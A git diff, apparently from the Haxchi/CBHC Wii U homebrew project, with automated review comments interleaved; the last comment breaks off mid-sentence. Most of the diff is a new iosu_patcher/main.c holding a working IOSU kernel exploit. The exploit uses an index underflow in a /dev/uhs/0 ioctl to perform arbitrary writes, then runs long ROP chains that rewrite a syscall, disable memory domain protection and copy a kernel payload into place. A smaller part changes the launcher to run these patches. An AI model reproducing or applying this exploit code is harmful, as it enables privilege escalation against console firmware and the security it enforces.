@@ -54,12 +55,15 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) section_write_word(ios_elf_start, 0x05054D6C, 0xE3A00000); // mov r0, 0 section_write_word(ios_elf_start, 0x05054D70, 0xE12FFF1E); // bx lr - // change system.xml to syshax.xml - section_write_word(ios_elf_start, 0x050600F0, 0x79736861); // ysha - section_write_word(ios_elf_start, 0x050600F4, 0x782E786D); // x.xm + if(from_cbhc) // coldboot specific patches + { + // change system.xml to syshax.xml + section_write_word(ios_elf_start, 0x050600F0, 0x79736861); // ysha + section_write_word(ios_elf_start, 0x050600F4, 0x782E786D); // x.xm - section_write_word(ios_elf_start, 0x05060114, 0x79736861); // ysha - section_write_word(ios_elf_start, 0x05060118, 0x782E786D); // x.xm + section_write_word(ios_elf_start, 0x05060114, 0x79736861); // ysha + section_write_word(ios_elf_start, 0x05060118, 0x782E786D); // x.xm + } // jump to titleprot code (titleprot_addr+4) section_write_word(ios_elf_start, 0x05107F70, 0xF005FD0A); //bl (titleprot_addr+4) diff --git a/dsrom/CBHC/arm_kernel/source/reload.h b/dsrom/iosu_patcher/arm_kernel/source/reload.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/reload.h rename to dsrom/iosu_patcher/arm_kernel/source/reload.h diff --git a/dsrom/CBHC/arm_kernel/source/types.h b/dsrom/iosu_patcher/arm_kernel/source/types.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/types.h rename to dsrom/iosu_patcher/arm_kernel/source/types.h diff --git a/dsrom/CBHC/arm_kernel/source/utils.c b/dsrom/iosu_patcher/arm_kernel/source/utils.c similarity index 100% rename from dsrom/CBHC/arm_kernel/source/utils.c rename to dsrom/iosu_patcher/arm_kernel/source/utils.c diff --git a/dsrom/CBHC/arm_kernel/source/utils.h b/dsrom/iosu_patcher/arm_kernel/source/utils.h similarity index 100% rename from dsrom/CBHC/arm_kernel/source/utils.h rename to dsrom/iosu_patcher/arm_kernel/source/utils.h 
diff --git a/dsrom/CBHC/arm_user/Makefile b/dsrom/iosu_patcher/arm_user/Makefile similarity index 100% rename from dsrom/CBHC/arm_user/Makefile rename to dsrom/iosu_patcher/arm_user/Makefile diff --git a/dsrom/CBHC/arm_user/link.ld b/dsrom/iosu_patcher/arm_user/link.ld similarity index 100% rename from dsrom/CBHC/arm_user/link.ld rename to dsrom/iosu_patcher/arm_user/link.ld diff --git a/dsrom/CBHC/arm_user/source/crt0.s b/dsrom/iosu_patcher/arm_user/source/crt0.s similarity index 100% rename from dsrom/CBHC/arm_user/source/crt0.s rename to dsrom/iosu_patcher/arm_user/source/crt0.s diff --git a/dsrom/CBHC/arm_user/source/main.c b/dsrom/iosu_patcher/arm_user/source/main.c similarity index 100% rename from dsrom/CBHC/arm_user/source/main.c rename to dsrom/iosu_patcher/arm_user/source/main.c diff --git a/dsrom/CBHC/arm_user/source/types.h b/dsrom/iosu_patcher/arm_user/source/types.h similarity index 100% rename from dsrom/CBHC/arm_user/source/types.h rename to dsrom/iosu_patcher/arm_user/source/types.h diff --git a/dsrom/CBHC/arm_user/source/utils.c b/dsrom/iosu_patcher/arm_user/source/utils.c similarity index 100% rename from dsrom/CBHC/arm_user/source/utils.c rename to dsrom/iosu_patcher/arm_user/source/utils.c diff --git a/dsrom/CBHC/arm_user/source/utils.h b/dsrom/iosu_patcher/arm_user/source/utils.h similarity index 100% rename from dsrom/CBHC/arm_user/source/utils.h rename to dsrom/iosu_patcher/arm_user/source/utils.h diff --git a/dsrom/cfw_booter/coreinit.h b/dsrom/iosu_patcher/coreinit.h similarity index 100% rename from dsrom/cfw_booter/coreinit.h rename to dsrom/iosu_patcher/coreinit.h diff --git a/dsrom/iosu_patcher/crt0.S b/dsrom/iosu_patcher/crt0.S new file mode 100644 index 0000000..4c5415a --- /dev/null +++ b/dsrom/iosu_patcher/crt0.S @@ -0,0 +1,6 @@ + + .extern patch_iosu + .globl _start + +_start: + b patch_iosu diff --git a/dsrom/iosu_patcher/main.c b/dsrom/iosu_patcher/main.c new file mode 100644 index 0000000..a4861c3 --- /dev/null 
+++ b/dsrom/iosu_patcher/main.c 
@@ -0,0 +1,388 @@ +/* + * Copyright (C) 2016 FIX94 + * + * This software may be modified and distributed under the terms + * of the MIT license. See the LICENSE file for details. + */ +#include +#include "types.h" +#include "coreinit.h" +#include "../global.h" + +#define CHAIN_START 0x1016AD40 +#define SHUTDOWN 0x1012EE4C +#define SIMPLE_RETURN 0x101014E4 +#define SOURCE 0x01E20000 +#define IOS_CREATETHREAD 0x1012EABC +#define ARM_CODE_BASE 0x08135000 +#define REPLACE_SYSCALL 0x081298BC + +/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */ +#include "payload/arm_kernel_bin.h" +#include "payload/arm_user_bin.h" + +static void uhs_exploit_init(unsigned int coreinit_handle); +static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val); + +void patch_iosu(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) +{ + unsigned long long(*_SYSGetSystemApplicationTitleId)(int sysApp); + OSDynLoad_FindExport(sysapp_handle,0,"_SYSGetSystemApplicationTitleId",&_SYSGetSystemApplicationTitleId); + unsigned long long sysmenu = _SYSGetSystemApplicationTitleId(0); + + unsigned long long(*OSGetTitleID)(); + OSDynLoad_FindExport(coreinit_handle, 0, "OSGetTitleID", &OSGetTitleID); + unsigned int dsvcid = (unsigned int)(OSGetTitleID(0) & 0xFFFFFFFF); + + void (*DCStoreRange)(const void *addr, uint32_t length); + OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); + + memcpy((void*)0xF5E70100, &sysmenu, 8); + *(volatile unsigned int*)0xF5E70108 = dsvcid; + *(volatile unsigned int*)0xF5E7010C = launchmode; + *(volatile unsigned int*)0xF5E70110 = from_cbhc; + DCStoreRange((void*)0xF5E70100, 0x20); + + int (*IOS_Open)(char *path, unsigned int mode); + int (*IOS_Close)(int fd); + OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); + OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); + + int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! 
Open /dev/uhs/0 IOS node + uhs_exploit_init(coreinit_handle); //! Init variables for the exploit + + //!------ROP CHAIN------- + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20); + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C); + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE); + + uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC} + + IOS_Close(dev_uhs_0_handle); +} + +/* ROP CHAIN STARTS HERE (0x1015BD78) */ +static const int final_chain[] = { + 0x101236f3, // 0x00 POP {R1-R7,PC} + 0x0, // 0x04 arg + 0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR + 0x68, // 0x0C stacksize + 0x10101638, // 0x10 + 0x0, // 0x14 + 0x0, // 0x18 + 0x0, // 0x1C + 0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x30 + 0x0, // 0x34 + IOS_CREATETHREAD, // 0x38 + 0x1, // 0x3C + 0x2, // 0x40 + 0x10123a9f, // 0x44 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE92D4010, // 0x4C value: PUSH {R4,LR} + 0x0, // 0x50 + 0x10123a8b, // 0x54 POP {R3,R4,PC} + 0x1, // 0x58 R3 must be 1 for the arbitrary write + 0x0, // 0x5C + 0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x64 + 0x0, // 0x68 + 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) + 0x0, // 0x70 + 0x0, // 0x74 + 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A04000, // 0x80 value: MOV R4, R0 + 0x0, // 0x84 + 0x10123a8b, // 0x88 POP {R3,R4,PC} + 0x1, // 0x8C R3 must be 1 for the arbitrary write + 0x0, // 0x90 + 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x98 + 0x0, // 0x9C + 0x1012EE64, // 0xA0 
set_panic_behavior (arbitrary write) + 0x0, // 0xA4 + 0x0, // 0xA8 + 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF + 0x0, // 0xB8 + 0x10123a8b, // 0xBC POP {R3,R4,PC} + 0x1, // 0xC0 R3 must be 1 for the arbitrary write + 0x0, // 0xC4 + 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0xCC + 0x0, // 0xD0 + 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) + 0x0, // 0xD8 + 0x0, // 0xDC + 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) + 0x0, // 0xEC + 0x10123a8b, // 0xF0 POP {R3,R4,PC} + 0x1, // 0xF4 R3 must be 1 for the arbitrary write + 0x0, // 0xF8 + 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x100 + 0x0, // 0x104 + 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) + 0x0, // 0x10C + 0x0, // 0x110 + 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A00004, // 0x11C value: MOV R0, R4 + 0x0, // 0x120 + 0x10123a8b, // 0x124 POP {R3,R4,PC} + 0x1, // 0x128 R3 must be 1 for the arbitrary write + 0x0, // 0x12C + 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x134 + 0x0, // 0x138 + 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) + 0x0, // 0x140 + 0x0, // 0x144 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 
+ 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0x00000000, // 0x150 value: NOP + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0x1AFFFFFD, // 0x150 value: BNE clean_loop + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, 
R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A03004, // 0x184 value: MOV R3, R4 + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE8BD4010, // 0x184 value: POP {R4,LR} + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) + 0x0, // 0x1BC + 0x10123a8b, // 0x1C0 POP {R3,R4,PC} + 0x1, // 0x1C4 R3 must be 1 for the arbitrary write + 0x0, // 0x1C8 + 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x1D0 + 0x0, // 0x1D4 + 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 + 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches + 0x0, // 0x1E0 + 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + 
ARM_CODE_BASE, // 0x1E8 our code destination address + 0x0, // 0x1EC + 0x0, // 0x1F0 + 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} + 0x0, // 0x1F8 + sizeof(arm_kernel_bin), // 0x1FC our code size + 0x0, // 0x200 + 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} + 0x01E40000, // 0x208 our code source location + 0x08131D04, // 0x20C KERNEL_MEMCPY address + 0x0, // 0x210 + 0x0, // 0x214 + 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) + 0x0, + 0x0, + 0x101312D0, +}; + +static const int second_chain[] = { + 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} + CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination + 0x0, // 0x08 + 0x0, // 0x0C + 0x101063db, // 0x10 POP {R1,R2,R5,PC} + 0x01E30000, // 0x14 source + sizeof(final_chain), // 0x18 length + 0x0, // 0x1C + 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x101236f3, // 0x2C POP {R1-R7,PC} + 0x0, // 0x30 arg + 0x101001DC, // 0x34 stackptr + 0x68, // 0x38 stacksize + 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x40 + 0x0, // 0x44 + 0x0, // 0x48 + 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x50 + 0x0, // 0x54 + 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x5C + 0x0, // 0x60 + IOS_CREATETHREAD, // 0x64 + 0x1, // 0x68 priority + 0x2, // 0x6C flags + 0x0, // 0x70 + 0x0, // 0x74 + 0x101063db, // 0x78 POP {R1,R2,R5,PC} + 0x0, // 0x7C + -(0x240 + 0x18 + 0xF000), // 0x80 stack offset + 0x0, // 0x84 + 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} + 0x0, + 0x0, + 0x0, + 0x00110000 - 0x44, // 0x8C + 0x00110010, // 0x90 + 0x0, // 0x94 + 0x0, // 0x98 + 0x0, // 0x9C + 0x0, // 0xA0 + 0x0, // 0xA4 + 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack + 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} + 0x0, + 0x0, + 0x1012EA68, // 0xAC stack pivot +}; + +static void uhs_exploit_init(unsigned int 
coreinit_handle) +{ + void (*DCStoreRange)(const void *addr, uint32_t length); + OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); + + //! Clear out our used MEM1 area + memset((void*)0xF5E00000, 0, 0x00070000); + DCStoreRange((void*)0xF5E00000, 0x00070000); + + //!------Variables used in exploit------ + int *pretend_root_hub = (int*)0xF5E60640; + int *ayylmao = (int*)0xF5E00000; + //!------------------------------------- + + ayylmao[5] = 1; + ayylmao[8] = 0x1E00000; + + memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain)); + memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain)); + memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin)); + memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin)); + + pretend_root_hub[33] = 0x1E00000; + pretend_root_hub[78] = 0; + + //! Store current CPU cache into main memory for IOSU to read + DCStoreRange(ayylmao, 0x840); + + DCStoreRange((void*)0xF5E20000, sizeof(second_chain)); + DCStoreRange((void*)0xF5E30000, sizeof(final_chain)); + DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin)); + DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin)); + + DCStoreRange(pretend_root_hub, 0x160); +} + +static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val) +{ + void (*DCStoreRange)(const void *addr, uint32_t length); + void (*OSSleepTicks)(uint64_t ticks); + int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len); + OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange); + OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks); + OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl); + + //!------Variables used in exploit------ + int *ayylmao = (int*)0xF5E00000; + //!------------------------------------- + + ayylmao[520] = arm_addr - 24; //! 
The address to be overwritten, minus 24 bytes + DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read + OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU + //! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640, + //! which is the physical address of 0xF5E60640 for us, right at the end of MEM1 + int request_buffer[] = { -(0xB349B), val }; + int output_buffer[32]; + return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); +} diff --git a/dsrom/CBHC/titleprot/Makefile b/dsrom/iosu_patcher/titleprot/Makefile similarity index 100% rename from dsrom/CBHC/titleprot/Makefile rename to dsrom/iosu_patcher/titleprot/Makefile diff --git a/dsrom/CBHC/titleprot/ccd00.ld b/dsrom/iosu_patcher/titleprot/ccd00.ld similarity index 100% rename from dsrom/CBHC/titleprot/ccd00.ld rename to dsrom/iosu_patcher/titleprot/ccd00.ld diff --git a/dsrom/CBHC/titleprot/ccd00.specs b/dsrom/iosu_patcher/titleprot/ccd00.specs similarity index 100% rename from dsrom/CBHC/titleprot/ccd00.specs rename to dsrom/iosu_patcher/titleprot/ccd00.specs diff --git a/dsrom/CBHC/titleprot/source/crt0.s b/dsrom/iosu_patcher/titleprot/source/crt0.s similarity index 100% rename from dsrom/CBHC/titleprot/source/crt0.s rename to dsrom/iosu_patcher/titleprot/source/crt0.s diff --git a/dsrom/cfw_booter/types.h b/dsrom/iosu_patcher/types.h similarity index 94% rename from dsrom/cfw_booter/types.h rename to dsrom/iosu_patcher/types.h index e9194b3..828591e 100644 --- a/dsrom/cfw_booter/types.h +++ b/dsrom/iosu_patcher/types.h @@ -17,6 +17,4 @@ typedef _Bool bool; #define false 0 #define null 0 -#define NULL (void*)0 - #endif /* TYPES_H */ diff --git a/dsrom/option_select/Makefile b/dsrom/option_select/Makefile index a512614..ae0c1e8 100644 --- a/dsrom/option_select/Makefile +++ b/dsrom/option_select/Makefile 
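Review bot: `dev_uhs_0_handle` returned by `IOS_Open("/dev/uhs/0", 0)` is never checked before it is passed to uhs_write32 and IOS_Close, so an error return becomes the fd in an IOS_Ioctl call; `if (dev_uhs_0_handle < 0) return;` before `uhs_exploit_init(coreinit_handle)` avoids operating on an invalid handle, and the return values of the four uhs_write32 calls are likewise discarded. The offset comments in `final_chain` are stale copy-paste — after `// 0x178` the numbering restarts at `// 0x148` several times and the tail repeats `0x1DC`/`0x1E0`/`0x1E4` — and the header `ROP CHAIN STARTS HERE (0x1015BD78)` disagrees with `CHAIN_START` (0x1016AD40); correcting them would make the table reviewable. The bare `#include` at the top of the file lost its header name in this rendering and cannot be checked here.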
@@ -12,8 +12,6 @@ project := . root := $(CURDIR) build := $(root)/bin -CFLAGS += -DUSE_SD_LOADER -ASFLAGS += -DUSE_SD_LOADER FIRMWARE = 550 all: clean setup main @@ -26,9 +24,9 @@ main: $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S cp -r $(root)/*.o $(build) rm $(root)/*.o - $(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map - $(OBJCOPY) code$(FIRMWARE).elf -S -O binary ../code$(FIRMWARE).bin + $(LD) -o option_select.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map option_select.map + $(OBJCOPY) option_select.elf -S -O binary ../option_select.bin clean: rm -rf $(build) - rm -rf code$(FIRMWARE).elf code.map + rm -rf option_select.elf option_select.map diff --git a/dsrom/option_select/main.c b/dsrom/option_select/main.c index ac15e8e..9921c31 100644 --- a/dsrom/option_select/main.c +++ b/dsrom/option_select/main.c @@ -7,6 +7,7 @@ #include #include "types.h" #include "coreinit.h" +#include "../global.h" typedef struct { @@ -111,7 +112,7 @@ uint32_t __main(void) void*(*MEMAllocFromDefaultHeap)(int size) = (void*)(*pMEMAllocFromDefaultHeap); void(*MEMFreeToDefaultHeap)(void *ptr) = (void*)(*pMEMFreeToDefaultHeap); - int hbl = 1; + int launchmode = LAUNCH_HBL; //default path goes to HBL strcpy((void*)0xF5E70000,"/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf"); @@ -229,7 +230,7 @@ uint32_t __main(void) } else __os_snprintf((void*)0xF5E70000,32,"/vol/sdcard"); - hbl = 0; + launchmode = LAUNCH_CFW_IMG; break; } else if(memcmp(FnameChar+fLen-4,".elf",5) == 0) @@ -238,6 +239,12 @@ uint32_t __main(void) __os_snprintf((void*)0xF5E70000,250,"/vol/external01%s",FnameChar); else __os_snprintf((void*)0xF5E70000,250,"/vol/external01/%s",FnameChar); + launchmode = LAUNCH_HBL; + break; + } + else if(memcmp(FnameChar+fLen-7,"sysmenu",8) == 0) + { + launchmode = LAUNCH_SYSMENU; break; } } 
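Review bot: `memcmp(FnameChar+fLen-7,"sysmenu",8)` in the `@@ -238` hunk reads starting seven bytes before the end of the name without first checking `fLen >= 7`, so a config entry shorter than seven characters starts the comparison before `FnameChar` (an out-of-bounds read); the pre-existing `.elf` comparison has the same shape with offset 4, but the new line widens the window. Guard it: `else if(fLen >= 7 && memcmp(FnameChar+fLen-7,"sysmenu",8) == 0)`. Comparing 8 bytes also relies on the terminating NUL sitting at `FnameChar[fLen]`, which deserves a short comment. `__main` starts outside the hunk.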
@@ -256,7 +263,32 @@ fileEnd: if(pBuffer) MEMFreeToDefaultHeap(pBuffer); - DCStoreRange((void*)0xF5E70000,0x100); - uint32_t entry = (hbl ? 0x01800000 : 0x0180C000); - return entry; + if(launchmode == LAUNCH_HBL) + return 0x01800000; + + //store path to sd fw.img for arm_kernel + if(launchmode == LAUNCH_CFW_IMG) + DCStoreRange((void*)0xF5E70000,0x100); + + unsigned int sysapp_handle; + OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle); + void (*SYSLaunchMenu)(void); + OSDynLoad_FindExport(sysapp_handle, 0,"SYSLaunchMenu", &SYSLaunchMenu); + + int (*OSForceFullRelaunch)(void); + OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); + + void (*OSExitThread)(int); + OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread); + + //do iosu patches + void (*patch_iosu)(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) = (void*)0x01804000; + patch_iosu(coreinit_handle, sysapp_handle, launchmode, 0); + + if(launchmode == LAUNCH_CFW_IMG) + OSForceFullRelaunch(); + SYSLaunchMenu(); + + OSExitThread(0); + return 0; } diff --git a/installer/src/main.c b/installer/src/main.c index 0ba1e11..b506d02 100644 --- a/installer/src/main.c +++ b/installer/src/main.c @@ -125,9 +125,9 @@ int availSort(const void *c1, const void *c2) void printhdr_noflip() { #ifdef CB - println_noflip(0,"CBHC v1.4 by FIX94"); + println_noflip(0,"CBHC v1.4u1 by FIX94"); #else - println_noflip(0,"Haxchi v2.3u1 by FIX94"); + println_noflip(0,"Haxchi v2.4 by FIX94"); #endif println_noflip(1,"Credits to smea, plutoo, yellows8, naehrwert, derrek and dimok"); } diff --git a/release/haxchi/config.txt b/release/haxchi/config.txt index 03cfa68..c529f89 100644 --- a/release/haxchi/config.txt +++ b/release/haxchi/config.txt @@ -1,2 +1,3 @@ a=fw.img +b=sysmenu default=wiiu/apps/homebrew_launcher/homebrew_launcher.elf \ No newline at end of file 
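Review bot: The `OSDynLoad_Acquire("sysapp.rpl", ...)` call and the three `OSDynLoad_FindExport` lookups are unchecked, yet `SYSLaunchMenu`, `OSForceFullRelaunch` and `OSExitThread` are called through the resulting pointers unconditionally; if any lookup fails, the pointer is an uninitialized local and the call jumps to an arbitrary address on a path that has already run the IOSU patcher. The earlier lookups in `__main` appear to follow the same unchecked pattern, but at minimum initialise these pointers to `NULL` and skip the call (or fall back to `return 0x01800000;`) when a lookup returns non-zero. The hard-coded `patch_iosu` entry at `0x01804000` deserves a comment naming what places the patcher there, e.g. `//iosu_patcher entry point; the binary is expected at 0x01804000 — TODO document who loads it there`. The rewrite also drops `DCStoreRange((void*)0xF5E70000,0x100)` for the 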